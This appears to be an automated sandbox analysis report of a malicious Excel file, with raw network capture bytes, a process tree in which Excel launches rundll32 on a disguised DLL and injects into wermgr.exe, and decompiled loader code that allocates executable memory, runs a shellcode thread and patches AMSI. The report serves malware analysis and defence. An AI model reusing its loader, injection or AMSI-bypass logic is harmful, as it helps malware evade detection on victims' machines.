                Apr 6, 2021 21:02:59.807019949 CEST4INData Raw: db 36 6d 6e a2 95 62 a9 5a 6b 26 4b 97 80 e4 b6 d7 b4 b9 c3 d1 8a b1 3f 2d 6e 13 4b 9d 2f 5a b1 9a 88 2c 4e a2 e8 94 fb b0 38 6c 3b 8c 91 6d 5b 4b 73 29 0a bb 71 df c4 06 10 34 3e 68 c3 0d f1 9f 56 d5 ac de 1f 2e 9b 7a ae 3a 86 8a c9 99 2d df 46
                Data Ascii: 6mnbZk&K?-nK/Z,N8l;m[Ks)q4>hV.z:-F!H-kjonCJ*EaC\S#;7zm}:uR4S+<C(\$t1!IaQn-cQn1v[bu^-v-yWnGn_pJScn[]n5
                Apr 6, 2021 21:02:59.807049990 CEST6INData Raw: cc 5a c4 a5 9f 77 30 4f 91 31 fa 79 80 99 89 9c a8 64 e7 03 cc 45 e4 30 3b 8b 71 fc 8a a4 5b c7 f2 39 a5 92 11 2b 26 a7 eb 9c b8 1e b8 e2 2c 0e 29 cc c0 13 3f 85 ba 3a 81 dc 79 58 07 ef 06 00 4f 0e 55 9a e0 31 67 e9 49 21 24 91 81 cb 40 7b 68 10
                Data Ascii: Zw0O1ydE0;q[9+&,)?:yXOU1gI!$@{hcHWh+v[DPB?f*gD<^J,ZL.b9(ylb"sL229wIxE"S-B:nb5%3)K_@J"+Jg3LWN~I'&-K7%
                Apr 6, 2021 21:02:59.807089090 CEST7INData Raw: b2 34 f2 4e 13 39 96 8c 31 91 ff 4c 21 43 19 e4 2c 13 e9 24 ef 6c cc 20 1f 4e 23 33 d5 cf 31 91 02 79 de 44 de 91 42 ce cb 20 87 36 65 90 e5 04 9b c8 99 29 e4 a4 4c f5 7f 01 12 50 e3 18 9a dc 6c 22 cf 4e 21 13 4b d3 c8 8d 66 ce d3 c8 95 26 f2 c8
                Data Ascii: 4N91L!C,$l N#31yDB 6e)LPl"N!Kf&#r e&P`C2aviw>>fAsm~8,[LZz-,5mq:y-<-.*JE&=e3d<wxd55.XA~^HC!kj"83=QwbvxM
                Apr 6, 2021 21:02:59.807125092 CEST8INData Raw: d7 72 42 8f 3d b6 8e 13 70 77 53 63 ba 8b 54 ad 5b 07 29 cd d4 5a 68 d6 8a 6c 5b 28 87 88 0d dc 1e 76 3b 48 a5 64 43 6c c2 36 48 d2 d9 fe 24 eb e0 2c e8 20 12 af f5 07 f0 71 82 3f b7 a2 e8 b2 85 ca 18 bc 93 dc b2 87 d2 a8 f7 00 e9 29 e2 8c 66 bc
                Data Ascii: rB=pwScT[)Zhl[(v;HdCl6H$, q?)f]pzwtIyF?<p_8s)gymJ%#f'.;[PT'>b?nBH"+K@gIch%hg=8e- dK!zN6Y)}d3;b9(-EVJK
                Apr 6, 2021 21:02:59.807180882 CEST9INData Raw: a7 cd d7 4f 8e c0 86 be 5e 28 c0 5e 92 b3 ca 75 23 b1 61 57 cb 0b b0 c3 39 db f4 67 d8 2c cc 4b c6 33 b4 3c 67 8f 97 9e 34 74 e4 73 41 2b 4c 90 5d 26 8e c2 a0 16 13 54 2c 93 8f 4e 14 04 ad 36 41 bc 4c 3a 0a 83 da 4c d0 18 d8 7f 61 d0 1a 13 54 02
                Data Ascii: O^(^u#aW9g,K3<g4tsA+L]&T,N6AL:LaT5A23A\yb$eL/+ueg!3X|4<&dr8ef2y.Y&\&l*VLd`-&s3'7tT"v,C<kO!X %YG:Bq&uTAN 7
                Apr 6, 2021 21:02:59.807224035 CEST10INData Raw: 31 66 61 30 0d 0a af 84 de 95 29 58 29 93 ba 2f 73 84 7e be 25 a7 da a5 05 aa 15 10 7a b7 29 34 a4 3c 7c 3c 2d 34 78 53 8e b0 54 62 52 41 92 32 06 4a 5a 64 f2 da f1 54 c9 4a c5 42 61 e0 b3 8e c0 b7 c8 f7 76 70 85 08 56 99 6c cc 23 1c fa 7c 34 82
                Data Ascii: 1fa0)X)/s~%z)4<|<-4xSTbRA2JZdTJBavpVl#|4M&?#JdrU\BH&'&*w03IXb+^&L]g*K#pY}e{sVr+l0[5|W/]5ArJG%#'
                Apr 6, 2021 21:02:59.807261944 CEST12INData Raw: b8 cd 10 2f 49 cc 45 b1 e8 3e 11 72 19 0b a9 64 29 c5 54 0d 31 55 54 74 18 15 96 43 05 b6 2e 0b 53 e7 45 92 5a d7 54 b6 ae 4a 82 de 4b ad ab 02 39 b7 c2 44 52 a8 c5 6c 08 d4 b8 9f 64 af df b9 55 74 b0 8a 52 54 74 84 56 a7 f2 5a 15 24 93 a6 74 de
                Data Ascii: /IE>rd)T1UTtC.SEZTJK9DRldUtRTtVZ$t*A|7/beMwh[(,`krBREO]cGIu9_C*(W2LP)cf: nS`w}7]npd]S7rHTy9|Q$^
                Apr 6, 2021 21:02:59.807301998 CEST13INData Raw: f5 1a ce e0 42 37 e4 b4 fb e2 9e 51 da 85 25 fc 6a 4f 6e bb fd af e6 98 39 8f 00 d2 07 f3 08 cf 8c 4a 28 92 c9 e5 79 84 95 b9 84 a8 78 92 81 61 6c c5 2e 13 1e c0 41 2c 9e 34 d5 9f 97 1e 87 57 78 99 90 37 47 19 07 e2 db df cc 2d 56 6e 16 f3 c4 24
                Data Ascii: B7Q%jOn9J(yxal.A,4Wx7G-Vn$IR,JLTvff"8!xP3)g4vQZ0"3`> K<X+snR(dh&cqpAl_J}71)|Yo4.OC-l)
                Apr 6, 2021 21:02:59.992163897 CEST15INData Raw: 14 09 ce 42 90 bc a7 7e f6 ba 0d 9c d0 53 2f 2d 67 2f fb 00 64 c4 dd e9 62 bd 1d 1c 82 9c a4 02 ce 47 eb dc bc 25 5c ec 27 fc 23 56 34 1f 30 10 6b b7 29 50 fa dd bf 30 bd 04 00 06 34 75 20 95 a3 7e 52 8f 98 84 a1 d1 b1 be f1 b1 d6 98 26 26 c2 b5
                Data Ascii: B~S/-g/dbG%\'#V40k)P04u ~R&&Q1_M<!Kg#m[2zblQ@e.@j'$5}l$dM\gE:*+b2,N0M2muU)V[{9]bR kjT39pyml^yM


                Code Manipulations

                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Start time:21:02:31
                Start date:06/04/2021
                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Wow64 process (32bit):false
                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Imagebase:0x13f1e0000
                File size:27641504 bytes
                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:21:02:37
                Start date:06/04/2021
                Path:C:\Windows\System32\rundll32.exe
                Wow64 process (32bit):false
                Commandline:rundll32 ..\sdbybsd.fds,StartW
                Imagebase:0xffbc0000
                File size:45568 bytes
                MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:21:02:37
                Start date:06/04/2021
                Path:C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit):true
                Commandline:rundll32 ..\sdbybsd.fds,StartW
                Imagebase:0xe00000
                File size:44544 bytes
                MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:21:02:38
                Start date:06/04/2021
                Path:C:\Windows\System32\wermgr.exe
                Wow64 process (32bit):
                Commandline:C:\Windows\system32\wermgr.exe
                Imagebase:
                File size:50688 bytes
                MD5 hash:41DF7355A5A907E2C1D7804EC028965D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate

                Disassembly

                Code Analysis

                Reset < >

                  Executed Functions

                  APIs
                  • LoadLibraryW.KERNEL32(00484054), ref: 00481047
                  • GetProcAddress.KERNEL32(00000000), ref: 0048104E
                    • Part of subcall function 00481B30: SetLastError.KERNEL32(0000000D,?,00481070,?,00000040), ref: 00481B3D
                  • SetLastError.KERNEL32(000000C1), ref: 00481096
                  Memory Dump Source
                  • Source File: 00000004.00000002.2082508697.0000000000481000.00000020.00000001.sdmp, Offset: 00481000, based on PE: false
                  Similarity
                  • API ID: ErrorLast$AddressLibraryLoadProc
                  • String ID:
                  • API String ID: 1866314245-0
                  • Opcode ID: a749363a218df71c47c14125c3ee474666331be56c435d0553c6f0bf6e640403
                  • Instruction ID: 4fcd0bef137727979a6c575fc7ce770c7ad08d0a817143090e68f9e285a36ed2
                  • Opcode Fuzzy Hash: a749363a218df71c47c14125c3ee474666331be56c435d0553c6f0bf6e640403
                  • Instruction Fuzzy Hash: EFF11CB4E00209EFDB04DF94C984AAEB7B5FF48304F20895AE905AB351D735EE42DB95
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E004D1000() {
                  				_Unknown_base(*)()* _v8;
                  				void* _v12;
                  				struct tagMSG _v40;
                  				long _v44;
                  				struct HWND__* _v48;
                  				long _v52;
                  				void* _v56;
                  				void* _t38;
                  				void* _t43;
                  				int _t45;
                  
                  				SetTimer(0, 0, 0x25b, 0); // executed
                  				while(GetMessageW( &_v40, 0, 0, 0) != 0) {
                  					_v40.message = _v40.message + 1;
                  					if(_v40.message != 0x114) {
                  						DispatchMessageW( &_v40);
                  						continue;
                  					} else {
                  					}
                  					break;
                  				}
                  				_v12 = 0;
                  				_v48 = 0;
                  				_v52 = 0x5000;
                  				while(_v52 > 0x1000) {
                  					_v52 = _v52 - 1;
                  				}
                  				_v44 = _v52;
                  				while(_v44 > 0x40) {
                  					_v44 = _v44 - 1;
                  				}
                  				do {
                  					_t38 = VirtualAlloc(_v12, 0x43000, _v52, _v44); // executed
                  					_v8 = _t38;
                  					if(_v8 == 0) {
                  						Sleep(0x1f4);
                  					}
                  				} while (_v8 == 0);
                  				_v48 =  &(_v48->i);
                  				E004D1140(_v48, _v8);
                  				_t43 = CreateThread(0, 0, _v8, 1, 0, 0); // executed
                  				_v56 = _t43;
                  				SetTimer(0, 0, 0x2000, 0); // executed
                  				while(1) {
                  					_t45 = GetMessageW( &_v40, 0, 0, 0);
                  					if(_t45 == 0) {
                  						break;
                  					}
                  					_v40.message = _v40.message + 1;
                  					if(_v40.message == 0x114) {
                  						return _t45;
                  					}
                  					DispatchMessageW( &_v40);
                  				}
                  				return _t45;
                  			}













                  0x004d1011
                  0x004d1017
                  0x004d1031
                  0x004d103b
                  0x004d1043
                  0x00000000
                  0x00000000
                  0x004d103d
                  0x00000000
                  0x004d103b
                  0x004d104b
                  0x004d1052
                  0x004d1059
                  0x004d1060
                  0x004d106f
                  0x004d106f
                  0x004d1077
                  0x004d107a
                  0x004d1086
                  0x004d1086
                  0x004d108b
                  0x004d109c
                  0x004d10a2
                  0x004d10a9
                  0x004d10b0
                  0x004d10b0
                  0x004d10b6
                  0x004d10c2
                  0x004d10cd
                  0x004d10e0
                  0x004d10e6
                  0x004d10f4
                  0x004d10fa
                  0x004d1104
                  0x004d110c
                  0x00000000
                  0x00000000
                  0x004d1114
                  0x004d111e
                  0x00000000
                  0x00000000
                  0x004d1126
                  0x004d1126
                  0x004d1131

                  APIs
                  • SetTimer.USER32(00000000,00000000,0000025B,00000000), ref: 004D1011
                  • GetMessageW.USER32 ref: 004D1021
                  • DispatchMessageW.USER32(?), ref: 004D1043
                  • VirtualAlloc.KERNELBASE(00000000,00043000,00001000,00000040), ref: 004D109C
                  • Sleep.KERNEL32(000001F4), ref: 004D10B0
                  • CreateThread.KERNELBASE(00000000,00000000,00000000,00000001,00000000,00000000), ref: 004D10E0
                  • SetTimer.USER32(00000000,00000000,00002000,00000000), ref: 004D10F4
                  • GetMessageW.USER32 ref: 004D1104
                  • DispatchMessageW.USER32(?), ref: 004D1126
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.2082548957.00000000004D1000.00000020.00000001.sdmp, Offset: 004D0000, based on PE: true
                  • Associated: 00000004.00000002.2082546365.00000000004D0000.00000004.00000001.sdmp Download File
                  • Associated: 00000004.00000002.2082569975.0000000000504000.00000002.00000001.sdmp Download File
                  Similarity
                  • API ID: Message$DispatchTimer$AllocCreateSleepThreadVirtual
                  • String ID: @
                  • API String ID: 368155642-2766056989
                  • Opcode ID: 74a383e66ff83dc5bd1dd57477f41c022a9f664caa58e21009dd1a7dc6ba4bd5
                  • Instruction ID: 135728d1ac2703780bec4d3b95cb6101cb20b9f01b50bd71b51be478341b90a6
                  • Opcode Fuzzy Hash: 74a383e66ff83dc5bd1dd57477f41c022a9f664caa58e21009dd1a7dc6ba4bd5
                  • Instruction Fuzzy Hash: 1F412C70A44208FBEB10DFE4DD69BDEB774BB48705F20411AEB01BA2D0C779A944DB69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetProcAddress.KERNEL32(?,?), ref: 024408AD
                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 024409BB
                  • CreateProcessInternalW.KERNEL32(?,00000000,?,00000000,00000000,00000000,0800000C,00000000,?,?,?), ref: 02440A7A
                  • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 02440D2B
                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,?,?), ref: 02440D61
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.2083063741.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false
                  Similarity
                  • API ID: CreateProcessWow64$AddressDirectoryDisableInternalProcRedirectionSystem
                  • String ID: L!m>$L!m>
                  • API String ID: 2693396481-4066150234
                  • Opcode ID: d1cc232596852cd859bce245b7a16e3048cbe82a864eace8dbb5c83123e3128e
                  • Instruction ID: 12490fc7aa0fc51fe77cea4826760ec092f21f1b5e77407ea2c00012c90b101b
                  • Opcode Fuzzy Hash: d1cc232596852cd859bce245b7a16e3048cbe82a864eace8dbb5c83123e3128e
                  • Instruction Fuzzy Hash: DFF17D74249340DFE628CA18C480B2AB7E2BB99744F14281FF685DB3A0DB71E895CF13
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • SetLastError.KERNEL32(0000007F), ref: 004814DB
                  • SetLastError.KERNEL32(0000007F), ref: 00481507
                  Memory Dump Source
                  • Source File: 00000004.00000002.2082508697.0000000000481000.00000020.00000001.sdmp, Offset: 00481000, based on PE: false
                  Similarity
                  • API ID: ErrorLast
                  • String ID:
                  • API String ID: 1452528299-0
                  • Opcode ID: c96927600d48f8e3ae25693409e03cca76b69ecb04e7777e0fd364aca83b9f66
                  • Instruction ID: a72c9133e6f16f9ad9949b29f8bf0808811f68ec32971cd3401728a605465a1c
                  • Opcode Fuzzy Hash: c96927600d48f8e3ae25693409e03cca76b69ecb04e7777e0fd364aca83b9f66
                  • Instruction Fuzzy Hash: DE711A74E00109EFCB04EF94C590AAEB7B5FF48304F24899AD456AB351D734EE82CB95
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 004821F9
                  • SetLastError.KERNEL32(0000007E), ref: 0048223B
                  Memory Dump Source
                  • Source File: 00000004.00000002.2082508697.0000000000481000.00000020.00000001.sdmp, Offset: 00481000, based on PE: false
                  Similarity
                  • API ID: ErrorHugeLastRead
                  • String ID:
                  • API String ID: 3239643929-0
                  • Opcode ID: ae1493b0f0d66b114a65308c5d4d6e8651e3db0a03506f79da1d9cfa49027e6d
                  • Instruction ID: 52d72678fd47586a133db9f31263573d78a7313b67bd93be3799a8e630cbb0c4
                  • Opcode Fuzzy Hash: ae1493b0f0d66b114a65308c5d4d6e8651e3db0a03506f79da1d9cfa49027e6d
                  • Instruction Fuzzy Hash: 3E81DB74A00209DFCB04DF94C994AAEBBB1FF48314F248599E909AB351C778EE81CF95
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetNativeSystemInfo.KERNEL32(?,?,?,?,00280005), ref: 002800E9
                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00280005), ref: 00280111
                  Memory Dump Source
                  • Source File: 00000004.00000002.2082453743.0000000000280000.00000040.00000001.sdmp, Offset: 00280000, based on PE: false
                  Similarity
                  • API ID: AllocInfoNativeSystemVirtual
                  • String ID:
                  • API String ID: 2032221330-0
                  • Opcode ID: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                  • Instruction ID: 4f0217ecdde87550853c7e6a61ea54d0ebec861a24c18cfc9c2770fefe37b0da
                  • Opcode Fuzzy Hash: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                  • Instruction Fuzzy Hash: 0ED10379A167068FD754EF59C8C472AB3E0FF94318F18852DE8958B281E374E869CB81
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000004.00000002.2082508697.0000000000481000.00000020.00000001.sdmp, Offset: 00481000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2ad20e1e4d46848f42de189484735f6df8b7e0434e4c4568c94283c35a077346
                  • Instruction ID: e59563a3dfb9b94bf4eeb74c878b678cb895a528f0ea9605ccfd49359857cfee
                  • Opcode Fuzzy Hash: 2ad20e1e4d46848f42de189484735f6df8b7e0434e4c4568c94283c35a077346
                  • Instruction Fuzzy Hash: CA41C574A00109AFDB04DF44C494BAEB7B6FB88314F24C95AEC195B365C779EE82CB84
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • VirtualAlloc.KERNELBASE(00000000,00481A51,00003000,00000004,000000BE,?,00481A51,?), ref: 00481A01
                  Memory Dump Source
                  • Source File: 00000004.00000002.2082508697.0000000000481000.00000020.00000001.sdmp, Offset: 00481000, based on PE: false
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: d2e4baabe1963989ab0721a26b9c8c29db402dbd7e9e13b1b0056db16d90bff0
                  • Instruction ID: c4a8ff01682eb194b18dff54836e6bc807633446df06055e0c66358ea4217e79
                  • Opcode Fuzzy Hash: d2e4baabe1963989ab0721a26b9c8c29db402dbd7e9e13b1b0056db16d90bff0
                  • Instruction Fuzzy Hash: 20D0C9B4645208BBE710CF84DC06F6DBBACD705A11F004195FE089B280D5B1AE0057A5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • VirtualFree.KERNELBASE(?,?,?), ref: 0048182F
                  Memory Dump Source
                  • Source File: 00000004.00000002.2082508697.0000000000481000.00000020.00000001.sdmp, Offset: 00481000, based on PE: false
                  Similarity
                  • API ID: FreeVirtual
                  • String ID:
                  • API String ID: 1263568516-0
                  • Opcode ID: 9feaa9e1ddfe6c79b052df1dc5a0dd284ae82a5c28f3f1c6044cd1900e9eae56
                  • Instruction ID: f328cf749ea7ccce9cbd02c0a152621c980c6cb044167796ec63702d59e97e7b
                  • Opcode Fuzzy Hash: 9feaa9e1ddfe6c79b052df1dc5a0dd284ae82a5c28f3f1c6044cd1900e9eae56
                  • Instruction Fuzzy Hash: 8AC04C7611430CAB8B04DF98EC84DAB37ADBB8CA11B148518BA1D87204C730F9108BA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  Memory Dump Source
                  • Source File: 00000004.00000002.2082453743.0000000000280000.00000040.00000001.sdmp, Offset: 00280000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3dc4c1101507dda9be7d1ca017cc9ed333707a61feece7f86d76402a0b178a7c
                  • Instruction ID: 6c2426c5946bd1b12150776e402d75b2f7fb4a96c26cbe1ed914422174163e58
                  • Opcode Fuzzy Hash: 3dc4c1101507dda9be7d1ca017cc9ed333707a61feece7f86d76402a0b178a7c
                  • Instruction Fuzzy Hash: 10F12AB8A11209EFDB44DF94C990AAEB7B5FF48304F208558E906AB385D770EE55CF90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000004.00000002.2082453743.0000000000280000.00000040.00000001.sdmp, Offset: 00280000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                  • Instruction ID: c8f70e0438a6a9d06f20101e2c6d42126f7eb572ec8fc253ab3a7deb65ae2846
                  • Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                  • Instruction Fuzzy Hash: D331D53AA5534A8FC750EF18C4C0A26B3E4FF88314F45096DEA9587352D334F91A8B91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • LoadLibraryExA.KERNEL32(00484070,00000000,00000800), ref: 004825F9
                  • GetProcAddress.KERNEL32(00000000,00484078), ref: 00482615
                  • VirtualProtect.KERNEL32(?,00000004,00000040,?), ref: 00482650
                  • VirtualProtect.KERNEL32(?,00000004,?,?), ref: 00482671
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.2082508697.0000000000481000.00000020.00000001.sdmp, Offset: 00481000, based on PE: false
                  Similarity
                  • API ID: ProtectVirtual$AddressLibraryLoadProc
                  • String ID: AMSI
                  • API String ID: 3300690313-3828877684
                  • Opcode ID: 2f5175e08fd3b8db4178acbd84ce76397fe44c82878d5dedda95cf5b48baee57
                  • Instruction ID: 6fa2fe4b16f12149100079b4759e7cdbb9024cbc6016ccd7e07691f887e823d5
                  • Opcode Fuzzy Hash: 2f5175e08fd3b8db4178acbd84ce76397fe44c82878d5dedda95cf5b48baee57
                  • Instruction Fuzzy Hash: 91111CB4E00209EFCB04DFD4C949BAEBBB4FB48705F20495AE60177380D7B46A45DB59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 00482468
                  • VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 004824B2
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.2082508697.0000000000481000.00000020.00000001.sdmp, Offset: 00481000, based on PE: false
                  Similarity
                  • API ID: ProtectVirtual
                  • String ID: @
                  • API String ID: 544645111-2766056989
                  • Opcode ID: daac883f2986b9344e416939984d01441e1818f729be90693440ec0cf6515caa
                  • Instruction ID: 379495a0e52d1ad31d4ffa28ce850bd5f8ae6fb2e4b4b60e4f48d085c0fd419d
                  • Opcode Fuzzy Hash: daac883f2986b9344e416939984d01441e1818f729be90693440ec0cf6515caa
                  • Instruction Fuzzy Hash: B221ECB4900109EFDF54DF94CA80BADBBB5BF44704F20899AD90667244C778AF41DB69
                  Uniqueness

                  Uniqueness Score: -1.00%